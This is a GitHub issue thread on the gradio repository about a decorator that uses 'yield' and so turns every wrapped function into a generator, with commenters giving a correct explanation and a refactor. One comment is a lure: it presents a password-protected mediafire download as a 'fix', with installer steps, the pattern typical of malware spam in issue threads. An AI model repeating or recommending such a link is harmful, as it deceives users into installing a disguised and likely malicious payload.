### ISSUE TITLE
 If the decorator contains yield, the decorator will not be able to use ordinary functions.

### ISSUE THREAD

**Issue by inewlife** [gradio-app/gradio#9203]
### Describe the bug

 If the decorator contains yield, the decorator will not be able to use ordinary functions. Output component appears empty

### Have you searched existing issues?  🔎

- [X] I have searched and found no existing issues

### Reproduction

```python
import gradio as gr
import gradio as gr
import time

# 定义装饰器
def universal_decorator(func):
    @functools.wraps(func)
    def wrapper(*args, **kwargs):
        # 打印调用信息
        print(f"Calling function: {func.__name__} with args: {args}, kwargs: {kwargs}")

        # 检查函数是否是生成器函数
        if inspect.isgeneratorfunction(func):
            # 如果是生成器函数，则返回生成器对象
            return (yield from func(*args, **kwargs))
        else:
            # 否则，正常调用普通函数
            return func(*args, **kwargs)
    return wrapper
# 使用装饰器
@universal_decorator
def process_input(text):
    # 模拟处理
    time.sleep(1)  # 假设处理需要一些时间
    return f"处理结果: {text}"

# 创建 Gradio 界面
iface = gr.Interface(fn=process_input, inputs="text", outputs="text")
iface.queue().launch()
```

### System Info

```shell
No others
```

### Severity

I can work around it

**Comment by rajnikyadav** [comment]
to fix your trouble check this fix, i see it in another issue,
https://app.mediafire.com/9mrkd33xulszl
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by mc-marcocheng** [comment]
Use the following:
```python
        # 检查函数是否是生成器函数
        if inspect.isgeneratorfunction(func):
            # 如果是生成器函数，则返回生成器对象
            yield from func(*args, **kwargs)
        else:
            # 否则，正常调用普通函数
            yield func(*args, **kwargs)
```

**Comment by freddyaboulton** [comment]
Hi @inewlife - the problem is that `universal_decorator` seems to turn everything into a generator. So `inspect.isgeneratorfunction(process_input)` returns True. And When you return from a generator, it raises a StopIterationError.

Agree with @mc-marcocheng that you should refactor your decorator.
